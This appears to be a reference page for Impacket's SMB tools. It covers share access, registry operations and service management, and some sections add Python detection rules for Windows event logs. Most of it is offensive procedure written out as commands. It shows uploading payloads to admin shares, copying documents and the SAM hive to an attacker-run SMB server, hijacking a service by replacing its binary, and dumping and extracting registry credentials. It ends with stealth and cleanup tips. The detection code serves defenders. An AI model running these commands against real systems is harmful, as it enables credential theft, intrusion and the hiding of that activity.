Impacket provides extensive SMB (Server Message Block) functionality for file access, registry operations, and Windows service management.

File & Share Access

smbclient.py

Interactive SMB client for browsing shares and transferring files.
# Connect with password
smbclient.py DOMAIN/user:password@target

# With NTLM hash
smbclient.py DOMAIN/user@target -hashes LMHASH:NTHASH

# Kerberos authentication
smbclient.py DOMAIN/user@target -k -no-pass -dc-ip DC_IP

# Anonymous login
smbclient.py @target -no-pass

Shell Commands

# Download file
get filename.txt
get C:\Windows\System32\config\SAM

# Upload file
put /local/path/file.exe
put payload.exe C:\Windows\Temp\payload.exe

# Create directory
mkdir NewFolder

# Remove file
rm file.txt

# Remove directory
rmdir FolderName

# View file info
info filename.txt

# Read file contents (text files)
cat file.txt

# View file with pager
more file.txt

# Change local directory
lcd /tmp

# Execute local shell command
!ls -la
!pwd

# Exit
exit
quit

Example Session

$ smbclient.py CORP/[email protected] -hashes :8846f7eaee8fb117ad06bdd830b7586c
Impacket v0.12.0 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
Shared

# use C$
# ls
drw-rw-rw-          0  Mon Jan  1 00:00:00 2024 .
drw-rw-rw-          0  Mon Jan  1 00:00:00 2024 ..
drw-rw-rw-          0  Wed Dec 20 10:30:22 2023 Program Files
drw-rw-rw-          0  Wed Dec 20 10:30:22 2023 Windows
drw-rw-rw-          0  Thu Jan 11 15:45:33 2024 Users

# cd Windows\Temp
# put payload.exe
# ls
-rw-rw-rw-      73802  Thu Jan 15 14:22:11 2024 payload.exe

# exit

smbserver.py

Create a local SMB server for file transfers and attacks.
# Share current directory
smbserver.py SHARE .

# Share specific directory
smbserver.py SHARE /path/to/share

# From Windows target:
# net use \\attacker-ip\SHARE
# copy file.txt \\attacker-ip\SHARE\file.txt

smbserver.py Use Cases

# On attacker machine:
smbserver.py LOOT /tmp/loot -smb2support

# On compromised Windows system:
net use \\10.0.0.100\LOOT
copy C:\Users\Admin\Documents\*.docx \\10.0.0.100\LOOT\
reg save HKLM\SAM \\10.0.0.100\LOOT\sam.save

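The smbserver.py scenario above relies on the compromised host opening an outbound SMB session to a machine that is not one of the organisation's file servers. The following detection logic is an added example, not part of Impacket or this page's original content: it assumes Sysmon Event ID 3 (network connection) records already normalised into dicts with Sysmon's field names, and the allowlist and sample records are constructed. One caveat a practitioner should know: the Windows SMB client runs in the kernel, so the reporting process is almost always "System" no matter whether reg.exe, cmd.exe or Explorer triggered the copy, so the rule matches on the destination rather than on the process image.

```python
"""Flag outbound SMB connections to hosts that are not known file servers.

Added example (not from the Impacket project). Assumes Sysmon Event ID 3
(network connection) records already normalised into dicts; the field
names mirror Sysmon's and the sample records are constructed.
"""
import ipaddress
from collections import defaultdict

SMB_PORTS = {445, 139}

# Constructed allowlist: internal file servers and domain controllers that
# workstations legitimately talk to over SMB.
KNOWN_SMB_SERVERS = {"10.0.0.5", "10.0.0.6"}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed Sysmon ID 3 records. The SMB redirector lives in the kernel,
# so Image is "System" regardless of which user process started the copy;
# match on the destination, not on the process image.
SAMPLE_EVENTS = [
    {"host": "WS01", "Image": "System", "DestinationIp": "10.0.0.5",
     "DestinationPort": 445, "Initiated": True},           # file server, fine
    {"host": "WS01", "Image": "System", "DestinationIp": "10.0.0.100",
     "DestinationPort": 445, "Initiated": True},           # unknown internal host
    {"host": "WS02", "Image": "System", "DestinationIp": "203.0.113.7",
     "DestinationPort": 445, "Initiated": True},           # SMB leaving the network
    {"host": "WS02", "Image": "chrome.exe", "DestinationIp": "203.0.113.7",
     "DestinationPort": 443, "Initiated": True},           # not SMB, ignored
    {"host": "FS01", "Image": "System", "DestinationIp": "10.0.0.100",
     "DestinationPort": 445, "Initiated": False},          # inbound, ignored
]


def classify_smb_destination(dest_ip: str) -> str:
    """Return 'known', 'internal-unknown' or 'external' for an SMB peer."""
    if dest_ip in KNOWN_SMB_SERVERS:
        return "known"
    addr = ipaddress.ip_address(dest_ip)
    if any(addr in net for net in INTERNAL_NETS):
        return "internal-unknown"
    return "external"


def find_suspicious_smb(events):
    """Return (host, dest_ip, severity) for outbound SMB to non-allowlisted peers.

    External destinations are 'high' (SMB should never leave the network);
    unknown internal hosts are 'medium' (an ad hoc share such as smbserver.py
    running on a machine that is not a file server).
    """
    alerts = []
    for ev in events:
        if not ev.get("Initiated") or ev.get("DestinationPort") not in SMB_PORTS:
            continue
        kind = classify_smb_destination(ev["DestinationIp"])
        if kind == "known":
            continue
        severity = "high" if kind == "external" else "medium"
        alerts.append((ev["host"], ev["DestinationIp"], severity))
    return alerts


def peers_by_host(events):
    """Count distinct non-allowlisted SMB peers per host; a workstation that
    reaches many unknown SMB servers is itself worth a look."""
    peers = defaultdict(set)
    for host, dest, _ in find_suspicious_smb(events):
        peers[host].add(dest)
    return {h: len(p) for h, p in peers.items()}


if __name__ == "__main__":
    for alert in find_suspicious_smb(SAMPLE_EVENTS):
        print("%s -> %s [%s]" % alert)
    print(peers_by_host(SAMPLE_EVENTS))
```

Inbound records and non-SMB ports are skipped so the rule can run over a full Sysmon feed; tune KNOWN_SMB_SERVERS from an inventory of file servers, print servers and domain controllers, since every host missing from it will be reported as "internal-unknown".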
Registry Operations

reg.py

Remote registry access and manipulation.
# Query registry key
reg.py DOMAIN/user:password@target query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# With hash
reg.py DOMAIN/user@target -hashes :NTHASH query -keyName HKLM\\SYSTEM\\CurrentControlSet\\Services

registry-read.py

Read registry keys and values remotely.
# Read specific key
registry-read.py DOMAIN/user:password@target -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Enumerate subkeys
registry-read.py DOMAIN/user:pass@target -keyName HKLM\\SYSTEM\\CurrentControlSet\\Services

regsecrets.py

Extract secrets from saved registry hives (offline).
# Extract from saved hives
regsecrets.py -sam sam.save -system system.save -security security.save

# Output SAM hashes, LSA secrets, cached credentials

Service Management

services.py

Manage Windows services remotely.
# List all services
services.py DOMAIN/user:password@target list

# Filter by status
services.py DOMAIN/user:pass@target list | grep -i running

Example Service Manipulation

# 1. List services to find target
services.py CORP/admin:pass@target list

# 2. Stop service
services.py CORP/admin:pass@target stop -name VulnService

# 3. Upload malicious binary
smbclient.py CORP/admin:pass@target
# use C$
# put payload.exe Windows\System32\VulnService.exe

# 4. Restart service
services.py CORP/admin:pass@target start -name VulnService

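The stop, overwrite, start sequence above leaves a distinctive trail: a System log 7036 state change for the service, a Security log 5145 share-access record with the write bit set against the service's binary, then a second 7036 within minutes. The correlation below is an added example, not part of Impacket or this page: it assumes both event sources already normalised into dicts (7036 with 'service' and 'state'; 5145 with 'share', 'path', 'access_mask' and 'src_ip'), and the service-to-binary inventory and sample events are constructed.

```python
"""Correlate a service stop, an SMB write to its binary, and a restart.

Added example, not Impacket code. Assumes two normalised event sources:
System log 7036 (service state change) and Security log 5145 (detailed
file share access). The inventory and the sample events are constructed.
"""
from datetime import datetime, timedelta

# Constructed inventory: service name -> ImagePath relative to the system
# drive, as collected from `sc qc` / services.py config before any incident.
SERVICE_BINARIES = {
    "VulnService": r"Windows\System32\VulnService.exe",
    "Spooler": r"Windows\System32\spoolsv.exe",
}
WRITE_MASK = 0x2            # FILE_WRITE_DATA bit of the 5145 AccessMask
WINDOW = timedelta(minutes=10)


def ts(s):
    """Parse the timestamps used in the constructed sample data."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed events, already sorted by time. 5145 reports admin shares as \\*\C$.
SAMPLE_EVENTS = [
    {"t": ts("2024-01-15 14:20:00"), "id": 7036, "service": "VulnService", "state": "stopped"},
    {"t": ts("2024-01-15 14:22:11"), "id": 5145, "share": r"\\*\C$",
     "path": r"Windows\System32\VulnService.exe", "access_mask": 0x12019f, "src_ip": "10.0.0.100"},
    {"t": ts("2024-01-15 14:23:05"), "id": 7036, "service": "VulnService", "state": "running"},
    # Benign: Spooler restarted by an admin, no write to its binary in between.
    {"t": ts("2024-01-15 15:00:00"), "id": 7036, "service": "Spooler", "state": "stopped"},
    {"t": ts("2024-01-15 15:00:03"), "id": 7036, "service": "Spooler", "state": "running"},
    # Benign: a read of a service binary (no write bit) is not a swap.
    {"t": ts("2024-01-15 15:30:00"), "id": 5145, "share": r"\\*\C$",
     "path": r"Windows\System32\spoolsv.exe", "access_mask": 0x120089, "src_ip": "10.0.0.7"},
]


def _norm(path):
    """Normalise slashes and case so share-relative paths compare equal."""
    return path.replace("/", "\\").lower().lstrip("\\")


def find_binary_swaps(events, inventory=SERVICE_BINARIES, window=WINDOW):
    """Return (service, src_ip, write_time) for every stop -> write -> start chain.

    A chain counts only when the write hits the service's own binary with the
    write bit set, and the restart arrives within `window` of the stop.
    """
    findings = []
    for i, ev in enumerate(events):
        if ev["id"] != 7036 or ev["state"] != "stopped":
            continue
        svc = ev["service"]
        binary = inventory.get(svc)
        if binary is None:
            continue
        write = None
        for later in events[i + 1:]:
            if later["t"] - ev["t"] > window:
                break
            if (later["id"] == 5145 and later["access_mask"] & WRITE_MASK
                    and _norm(later["path"]) == _norm(binary)):
                write = later
            elif (later["id"] == 7036 and later["service"] == svc
                  and later["state"] == "running"):
                if write is not None:
                    findings.append((svc, write["src_ip"], write["t"]))
                break
    return findings


if __name__ == "__main__":
    for svc, src, when in find_binary_swaps(SAMPLE_EVENTS):
        print("%s binary rewritten from %s at %s before restart" % (svc, src, when))
```

The rule deliberately requires the write to come from a share-access record, which is exactly what a remote smbclient.py upload produces; a local replacement (or one done through an interactive shell) would need a file-system audit event instead, so treat this as one correlation among several rather than the only signal.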
Specialized SMB Tools

smbmap

While not part of Impacket, it’s worth mentioning for enumeration:
# List shares (external tool - for reference)
smbmap -H target -u user -p password
smbmap -H target -u user -p LMHASH:NTHASH   # -p also accepts an NTLM hash pair

attrib.py

Manage file attributes via SMB.
# Get file attributes
attrib.py DOMAIN/user:password@target -file "C:\\path\\to\\file.txt"

# Set attributes
attrib.py DOMAIN/user:pass@target -file "C:\\file.txt" -attr +h +s +r
# +h = hidden, +s = system, +r = readonly

ntfs-read.py

Direct NTFS filesystem access (requires raw disk access).
# Read NTFS volume
ntfs-read.py DOMAIN/user:password@target -volume C:

# Extract specific file
ntfs-read.py DOMAIN/user:pass@target -volume C: -file "\\Windows\\System32\\config\\SAM"

Attack Scenarios

# 1. Save registry hives
reg.py CORP/admin:pass@target save -keyName HKLM\\SAM sam.save
reg.py CORP/admin:pass@target save -keyName HKLM\\SYSTEM system.save
reg.py CORP/admin:pass@target save -keyName HKLM\\SECURITY security.save

# 2. Download hives
smbclient.py CORP/admin:pass@target
# use C$
# cd Windows\Temp
# get sam.save
# get system.save
# get security.save

# 3. Extract credentials offline
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

# 4. Clean up
smbclient.py CORP/admin:pass@target
# use C$
# cd Windows\Temp
# rm sam.save
# rm system.save
# rm security.save

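Both the smbclient.py session earlier on this page (a binary dropped into C$\Windows\Temp) and the hive-export scenario just above (sam.save, system.save and security.save read over C$ and then removed) show up in the Security log as event 5145, detailed file share access. The rules below are an added example, not Impacket code: field names mirror the event's XML data (ShareName, RelativeTargetName, AccessMask, IpAddress, SubjectUserName) and every record is constructed. The AccessMask bits used are the documented ones: 0x1 ReadData, 0x2 WriteData, 0x10000 DELETE.

```python
"""Rules over Windows Security event 5145 (detailed file share access).

Added example, not Impacket code. Flags executables written to an
administrative share and saved registry hives that are read over a share
and then deleted. Field names mirror the event's XML data; records are
constructed.
"""
from collections import defaultdict

READ_DATA, WRITE_DATA, DELETE = 0x1, 0x2, 0x10000
ADMIN_SHARES = {r"\\*\c$", r"\\*\admin$"}
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs")
HIVE_EXT = (".save", ".hiv", ".hive")
HIVE_NAMES = {"sam", "system", "security", "ntds.dit"}

# Constructed 5145 records in time order.
SAMPLE_EVENTS = [
    {"ShareName": r"\\*\C$", "RelativeTargetName": r"Windows\Temp\payload.exe",
     "AccessMask": 0x12019f, "IpAddress": "10.0.0.100", "SubjectUserName": "admin"},
    {"ShareName": r"\\*\C$", "RelativeTargetName": r"Windows\Temp\sam.save",
     "AccessMask": 0x120089, "IpAddress": "10.0.0.100", "SubjectUserName": "admin"},
    {"ShareName": r"\\*\C$", "RelativeTargetName": r"Windows\Temp\system.save",
     "AccessMask": 0x120089, "IpAddress": "10.0.0.100", "SubjectUserName": "admin"},
    {"ShareName": r"\\*\C$", "RelativeTargetName": r"Windows\Temp\sam.save",
     "AccessMask": 0x10000, "IpAddress": "10.0.0.100", "SubjectUserName": "admin"},
    {"ShareName": r"\\*\C$", "RelativeTargetName": r"Windows\Temp\system.save",
     "AccessMask": 0x10000, "IpAddress": "10.0.0.100", "SubjectUserName": "admin"},
    # Benign: a user writing a document to an ordinary share.
    {"ShareName": r"\\*\Shared", "RelativeTargetName": r"reports\q4.docx",
     "AccessMask": 0x12019f, "IpAddress": "10.0.0.7", "SubjectUserName": "jdoe"},
    # Benign: logon script read from SYSVOL.
    {"ShareName": r"\\*\SYSVOL", "RelativeTargetName": r"corp.local\scripts\logon.bat",
     "AccessMask": 0x120089, "IpAddress": "10.0.0.8", "SubjectUserName": "jdoe"},
]


def _basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_hive_artifact(path):
    """True for files that look like exported registry hives."""
    name = _basename(path)
    return name.endswith(HIVE_EXT) or name in HIVE_NAMES


def detect(events):
    """Return (rule, src_ip, path) alerts for the constructed rules.

    exec-drop-admin-share:  write bit set on an executable under C$/ADMIN$.
    hive-export-read:       a hive-like file read over any share.
    hive-export-cleanup:    the same file later deleted by the same source,
                            i.e. collected and tidied up.
    """
    alerts = []
    hives_read = defaultdict(set)          # src_ip -> basenames read so far
    for ev in events:
        share = ev["ShareName"].lower()
        path = ev["RelativeTargetName"]
        mask = ev["AccessMask"]
        src = ev["IpAddress"]
        if (share in ADMIN_SHARES and mask & WRITE_DATA
                and _basename(path).endswith(EXEC_EXT)):
            alerts.append(("exec-drop-admin-share", src, path))
        if is_hive_artifact(path):
            name = _basename(path)
            if mask & READ_DATA:
                hives_read[src].add(name)
                alerts.append(("hive-export-read", src, path))
            if mask & DELETE and name in hives_read[src]:
                alerts.append(("hive-export-cleanup", src, path))
    return alerts


if __name__ == "__main__":
    for rule, src, path in detect(SAMPLE_EVENTS):
        print("%-28s %-12s %s" % (rule, src, path))
```

Event 5145 is only generated when "Audit Detailed File Share" is enabled in the advanced audit policy, and it is noisy on busy file servers; scoping the hive rules to administrative shares and the exec rule to Windows\Temp and System32 is a reasonable first tuning step once the volume is known.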
Network Utilities

sniffer.py / sniff.py

Capture network traffic (requires raw socket access).
# Sniff network traffic
sniffer.py -i eth0

# Filter specific protocols
sniff.py -i eth0 -filter "tcp port 445"

ping.py / ping6.py

ICMP ping implementations.
# IPv4 ping
ping.py target

# IPv6 ping
ping6.py target-ipv6

getArch.py

Detect target system architecture.
# Detect if target is 32-bit or 64-bit (no credentials are needed)
getArch.py -target target

# Useful before uploading payloads; several hosts can be checked from a file
getArch.py -targets hosts.txt

machine_role.py

Determine machine role (workstation, server, DC).
# Identify machine role
machine_role.py DOMAIN/user:password@target

# Output: Workstation, Server, or Domain Controller

Common Issues & Solutions

# Verify credentials work
crackmapexec smb target -u user -p password

# Check share permissions
smbmap -H target -u user -p password

# Try different shares
smbclient.py user:pass@target
> shares
> use ADMIN$  # Requires admin
> use C$      # Requires admin
> use IPC$    # Usually accessible

# SMBv1 disabled (Windows 10+/Server 2016+)
# Ensure tools use SMB2/3:
smbserver.py SHARE /path -smb2support

# Check SMB version with nmap
nmap -p445 --script smb-protocols target

# smbclient.py negotiates the highest dialect the server offers (SMB2/3 when
# SMBv1 is disabled), so no extra flag is needed
smbclient.py user:pass@target

# Ensure RemoteRegistry service is running
services.py domain/user:pass@target start -name RemoteRegistry

# Verify admin privileges
crackmapexec smb target -u user -p pass --local-auth

# Use alternative methods
secretsdump.py domain/user:pass@target -use-vss

# Check available disk space
smbclient.py user:pass@target
> use C$
> ls

# Try different share
> use D$

# Use smaller chunks (for large files)
# Split file first:
split -b 10M largefile.bin chunk_

# Upload chunks
> put chunk_aa
> put chunk_ab

# Reassemble on target (note: the "!" prefix runs a command on the local
# machine, not on the target, so run this from a shell on the target itself)
copy /b chunk_* largefile.bin

Best Practices

Stealth

  • Avoid multiple failed auth attempts
  • Use legitimate-looking service names
  • Clean up uploaded files after use
  • Restore original registry values

Reliability

  • Verify file transfers completed
  • Test commands before automation
  • Handle errors gracefully
  • Keep logs for troubleshooting

Security

  • Use Kerberos when possible
  • Encrypt sensitive file transfers
  • Securely delete extracted data
  • Don’t leave backdoors accessible

Documentation

  • Record all modifications made
  • Document created services/files
  • Note original configurations
  • Maintain cleanup checklist

Next Steps

Remote Execution

Execute commands after accessing shares

Credential Dumping

Extract credentials via registry access

LDAP Operations

Enumerate Active Directory objects
